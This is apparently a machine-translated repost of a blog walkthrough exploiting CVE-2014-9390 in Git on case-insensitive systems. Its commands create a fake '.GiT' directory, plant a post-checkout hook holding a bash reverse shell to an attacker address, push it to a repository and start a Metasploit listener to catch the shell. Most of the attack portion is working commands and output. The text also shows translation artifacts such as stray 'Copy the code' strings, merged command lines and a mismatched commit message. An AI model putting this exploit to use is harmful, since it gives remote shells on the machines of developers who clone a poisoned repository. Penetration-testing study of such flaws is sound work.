Kiss Snatchers · 2014/12/22 12:59
from:https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
0 x00 background
Cve-2014-9390 is a very popular vulnerability recently. A single git command can cause you to be hacked. I’m not going to go into the details of this vulnerability. And article.gmane.org/gmane.linux… Detailed information was released. In general, if you are using a case-insensitive operating system such as Windows or OSX, you should update your Git client.
Let’s look at this vulnerability in terms of penetration testing.
0 x01 to prepare
I created a new project named CVE-2014-9390.
Create a.git (big G, lowercase I, then uppercase T) directory, create a vulnerable. TXT file, and push it into the project.
#! bash[email protected]:~/cve-2014-9390# mkdir .GiT
[email protected]:~/cve-2014-9390# cd .GiT/
[email protected]:~/cve-2014-9390/.GiT# echo "Vulnerable" >> vulnerable.txt
[email protected]:~/cve-2014-9390/.GiT# cd ..
[email protected]:~/cve-2014-9390# git add .
[email protected]:~/cve-2014-9390# git commit -m 'poc'
[master bec157d] poc
1 file changed, 1 insertion(+)
create mode 100644 .GiT/vulnerable.txt
[email protected]:~/cve-2014-9390# git push
Copy the codeLet’s pull the same project from a Windows computer with a vulnerable Git client
#! bash[email protected] ~
$ git clone [email protected]:mehmet/cve-2014-9390.git
Cloning into 'cve-2014-9390'...
Enter passphrase for key '/c/Users/rootlab/.ssh/id_rsa':
remote: Counting objects: 7, done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 7 (delta 0), reused 0 (delta 0)R
Receiving objects: 100% (7/7), done.
Checking connectivity... done.
Copy the codeGit directory, which should be in git. GiT directory vulnerable.txt is also here
0 x02 use
What are git hooks
Like many other version control systems, Git has a method for executing custom scripts when important actions occur. Hooks have two aspects: client-side and server-side. Hooks on the client can be triggered when you commit and merge.
You can execute client-side scripts when you execute git commands such as git pull and Git checkout.
How to implement Git hooks?
Rewrite a script file in the.git/hooks directory and execute it, which we can do with this vulnerability.
Let’s create a fake Git directory and create a file called post-checkout.
#! bash[email protected]:~/cve-2014-9390# mkdir .GiT/hooks
[email protected]:~/cve-2014-9390# echo '#! /bin/sh' > .GiT/hooks/post-checkout[email protected]:~/cve-2014-9390# echo 'bash -i >& /dev/tcp/[IPADDRESS]/443 0>&1' >> .GiT/hooks/post-checkout
[email protected]:~/cve-2014-9390# git add .
[email protected]:~/cve-2014-9390# git commit -m 'add reverse connection payload' [master 389c979] add powershell payload 1 file changed, 4 insertions(+) create mode 100644 .GiT/hooks/post-checkout[email protected]:~//cve-2014-9390# git push
Copy the codeWe’re listening on the server side
#! bash msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD generic/shell_reverse_tcp msf exploit(handler) > Set LPORT 443 MSF exploit(handler) > set LHOST 108.61.164.142 MSF exploit(handler) > exploit [*] Started reverse Handler on 108.61.164.142:443 [*] Starting the payload handler...Copy the codeWe clone https://gitlab.com/mehmet/cve-2014-9390
It all seems normal, but…
